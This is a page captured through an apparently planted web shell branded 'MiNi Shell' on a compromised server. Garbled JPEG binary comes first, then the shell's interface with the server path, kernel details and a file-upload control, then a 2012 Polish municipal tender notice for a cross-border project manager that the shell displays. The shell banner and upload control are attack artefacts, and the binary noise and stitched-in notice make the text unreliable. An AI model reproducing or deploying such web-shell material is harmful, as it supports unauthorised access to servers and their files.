JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120223/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120223/54932-N-2012.html

<p class="kh_header"><b>Stara Kamienica: Świadczenie usługi  pełnienia funkcji kierownika  projektu EuRegioVital(e)2011</b><br>
<b>Numer ogłoszenia: 54932 - 2012; data zamieszczenia: 23.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Stara Kamienica , Stara Kamienica 41, 58-512 Stara Kamienica, woj. dolnośląskie, tel. 75 75 14 337, faks 75 75 14 337.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.new.bazagnim.pl/bip_stara_kamienica</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usługi  pełnienia funkcji kierownika  projektu EuRegioVital(e)2011.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem  zamówienia jest 
Świadczenie usługi  pełnienia funkcji  kierownika  projektu EuRegioVitale2011
realizowanym w ramach programu Operacyjnego Współpracy Transgranicznej
Polska Saksonia 2007-2013
Partnerem Wiodącym jest  Gmina Stara Kamienica 
Partnerzy Projektu Izerskie Centrum Pulmonologii i Chemioterapii NZOZ w Szklarskiej Porębie,  ABS Robur Zittau GmbH , Gmina Oybin
Funkcja Kierownika Projektu obejmuje następujący zakres rzeczowy
bieżące  kontakty z Instytucją Wdrażającą - Zarządzającą,
przygotowywanie pism i udzielanie wyjaśnień i odpowiedzi we wszystkich kwestiach związanych    z oceną Projektu przez właściwe instytucje wszelkiego szczebla,
monitorowanie rzeczowej i finansowej realizacji Projektu w oparciu o Harmonogram  rzeczowo -finansowy    i zatwierdzony budżet, 
przygotowywanie oferty aneksu do Umowy o dofinansowanie i doprowadzenie do jego podpisania, koordynowanie współpracy z Instytucją Zarządzającą w ramach aktualizacji Umowy  o dofinansowanie i Harmonogramów Realizacji Projektu, Harmonogramów składania wniosków   o płatność,systematyczne monitorowanie przebiegu realizacji projektu oraz informowanie niezwłoczne Zamawiającego oraz Instytucji Zarządzającej o zaistniałych nieprawidłowościach, pomiar  wartości wskaźników osiągniętych dzięki realizacji Projektu zgodnie z określonymi wskaźnikami monitoringu dla Projektu,nadzór nad  realizacją działań projektu zawartych w opisie projektu,nadzór nad wspólną realizacją projektu   zgodnie z koncepcją wdrażania według pakietów roboczych   określoną we wniosku o dofinansowanie,nadzór nad sporządzaniem   dwujęzycznych sprawozdań okresowych i sprawozdania końcowego z postępu realizacji projektu
opracowanie  Zasad Współpracy Zespołu Kierującego Projektem oraz Zasad Współpracy Wspólnego Personelu Projektu i ich przestrzeganie w trakcie wspólnej realizacji projektu,opracowanie  planów pracy dla Zespołu Kierującego Projektem i dla Grup  Roboczych  oraz  merytoryczny nadzór nad ich wdrażaniem,udział w spotkaniach Zespołu Kierującego Projektem oraz organizacja logistyczna spotkań  oraz organizacja logistyczna spotkań Zespołu Kierującego,nadzór nad wykonywaniem obowiązków dotyczących informacji i promocji oraz  koordynacja serwisów informacyjnych dotyczących realizacji projektu przygotowywanych  dla  mediów po obu stronach granicy ,monitorowanie  realizacji projektu  pod kątem ewentualnych  potrzeb w zakresie dokonywania  zmian w projekcie
wypracowanie programów merytorycznych i harmonogramu  dla  10  spotkań  studyjno-roboczych  mających na celu  wypracowanie wspólnych transgranicznych standardów turystyki zdrowotnej,merytoryczny nadzór nad przeprowadzeniem spotkań 10 studyjno-  roboczych oraz nadzór nad ich logistycznym  przeprowadzeniem ,dokonywanie wyboru oraz zapraszanie ekspertów zewnętrznych z obu stron granicy do udziału w spotkaniach studyjno-roboczych
współpraca z Saksońskim  Związkiem Uzdrowisk -  instytucją wyznaczoną przez Wspólny Sekretariat Techniczny  do nadzoru merytorycznego nad realizacją  projektu,monitorowanie zmian dotyczących transgranicznego charakteru projektu  
w stosunku do planowanego i zawartego w umowie o dofinansowanie
monitorowanie  działań partnerów projektu pod kątem zapewnienia  osiągnięcia   rezultatów projektu,  wartości wskaźników monitorujących 
wypracowanie  programu konferencji podsumowującej projekt oraz  zasad rekrutacji uczestników, listy zaproszonych ekspertów zewnętrznych z obu stron granicy i nadzór nad logistycznym przeprowadzeniem konferencji ,nadzór i weryfikacja merytoryczna materiałów zamieszczonych na platformie internetowej projektu administrowanej przez Zamawiającego,nadzór nad przygotowaniem   i weryfikacja merytoryczna  materiałów zamieszczanych w  dwujęzycznych folderach  promocyjnych edytowanych przez Zamawiającego,weryfikacja materiałów  przygotowanych przez  ekspertów  zewnętrznych  zaangażowanych    przez Zamawiającego  w realizację projektu ,współpraca z właściwymi strukturami  administracji  w Polsce i Saksonii ,nadzór nad wykonywaniem usługi tłumaczeniowej w zakresie  poprawnych i terminowych tłumaczeń ustnych i pisemnych   w celu zapewnienia zrozumienia  językowego,stała współpraca z mediami lokalnymi  po obu stronach granicy,niezwłoczne informowanie  Zamawiającego  o jakichkolwiek okolicznościach  wymagających zmian w projekcie, mogących mieć wpływ na prawidłową realizację ,przygotowywanie bieżącej   korespondencji    związanej  z wdrażaniem  projektu wynikającej z pełnienia przez Zamawiającego roli Partnera Wiodącego,przygotowanie programu działań transgranicznych na okres trwałości projektu,obecność  przy kontrolach związanych  z realizacją projektu.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1, 75.11.21.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>popartej należytym wykonaniem w okresie ostatnich trzech (3) lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,  co najmniej dwóch (2) usług z zakresu zarządzania projektem, w tym co najmniej jednej  realizowanej w ramach  współpracy transgranicznej. 

Wykonawcy zobowiązani są przedłożyć wykaz wykonanych usług sporządzony według wzoru stanowiącego Załącznik Nr 4 do niniejszej IDW, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączyć dokumenty potwierdzające, że usługi zostały wykonane należycie.

W przypadku wykazania wartości wykonanych usług  w walutach innych niż PLN-  należy podać kwotę w PLN, przeliczając kwotę wartości wykonanych usług rozliczanych w innych walutach  na  PLN wg kursu danej waluty, ogłaszanego przez Narodowy Bank Polski na 31 grudnia  2011 r. Ocena dokonywana będzie na zasadzie spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- posiadające umiejętność  praktycznego zastosowania przepisów dotyczących zarządzania,  koordynowania, nadzorowania  projektami współfinansowanymi z funduszy UE
-umiejętność  kierowania i zarządzania finansami oraz sporządzania dokumentacji finansowej  projektów współfinansowanych  z UE
-doświadczenie w zakresie  kierowania minimum jednym projektem współpracy międzynarodowej  z udziałem środków UE obejmującym zarówno działania  inwestycyjne  i tzw. działania miękkie 






Na potwierdzenie spełniania powyższych warunków Wykonawca jest zobowiązany przedstawić:

a) Wykaz - zestawienie  informacji na temat kwalifikacji zawodowych i/lub uprawnień, doświadczenia i wykształcenia  osób wskazanych do realizacji zamówienia  -  Załącznik nr 5 do IDW   
Ocena dokonywana będzie na zasadzie spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- posiadające umiejętność  praktycznego zastosowania przepisów dotyczących zarządzania,  koordynowania, nadzorowania  projektami współfinansowanymi z funduszy UE
-umiejętność  kierowania i zarządzania finansami oraz sporządzania dokumentacji finansowej  projektów współfinansowanych  z UE
-doświadczenie w zakresie  kierowania minimum jednym projektem współpracy międzynarodowej  z udziałem środków UE obejmującym zarówno działania  inwestycyjne              i tzw. działania miękkie 






Na potwierdzenie spełniania powyższych warunków Wykonawca jest zobowiązany przedstawić:
 Wykaz - zestawienie  informacji na temat kwalifikacji zawodowych i/lub uprawnień, doświadczenia i wykształcenia  osób wskazanych do realizacji zamówienia  -  Załącznik nr 5 do IDW   
Ocena dokonywana będzie na zasadzie spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca przedłoży oświadczenie, iż jest w sytuacji ekonomicznej i finansowej umożliwiającej wykonanie zamówienia. Ocena dokonywana będzie na zasadzie spełnia-nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>a)  zmiany kluczowego personelu wykonawcy wskazanego w ofercie do realizacji przedmiotu 
zamówienia na osobę (y) spełniającą (e) co najmniej warunki podmiotowe określone w  Cz. I. IDW, zmiany  podwykonawcy ;
a)	wystąpią zmiany związane z przekształceniem podmiotowym wykonawcy,
c)   nastąpi zmiana obowiązujących przepisów prawa związanych z przedmiotowym zamówieniem,
d)  zmiany umowy są konieczne na skutek działania organów administracji lub instytucji upoważnionych do  wydawania decyzji albo innych aktów władczych lub nadzorczych, związanych z realizacją przedmiotu  zamówienia,
e) zmiana terminu wykonywania przedmiotu umowy - zaistnieje siła wyższa uniemożliwiająca okresowe  wykonywanie przedmiotu umowy,
f)   zmiany dotyczące terminu wykonywania przedmiotu zamówienia - z przyczyn niezależnych od Wykonawcy,
g)  zmiana dotycząca przedmiotu zamówienia, jego zakresu, wynagrodzenia Wykonawcy, jego rozliczenia, obowiązków Wykonawcy - w przypadku wystąpienia okoliczności nie przewidzianych w chwili zawarcia umowy, a skutkujących koniecznością ograniczenia przez Zamawiającego zakresu przedmiotu zamówienia.
2. Zmiany umowy nie wymaga: zmiana danych teleadresowych, zmiana osób wskazanych do   kontaktów między stronami umowy, zmiana danych związanych z obsługą administracyjno-organizacyjną umowy  (np. zmiana rachunku bankowego).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.stara-kamienica.bazagmin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.stara-kamienica.bazagmin.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.03.2012 godzina 10:00, miejsce: Urząd Gminy Stara Kamienica, 58-512 Stara Kamienica 41  lub osobiście do sekretariatu pokój nr 16 -  I piętro ( adres  j. w.).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany  ze środków Programu Operacyjnego Współpracy Transgranicznej  Polska-Saksonia 2007-2013  w ramach Osi Priorytetowej 1  Współpraca transgraniczna,  Dziedziny Wsparcia  2 Turystyka                    i działalność uzdrowiskowa, Kierunek  Działań 5  Działania w dziedzinie uzdrowiskowej w ramach projektu EuRegioVital(e)2011.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com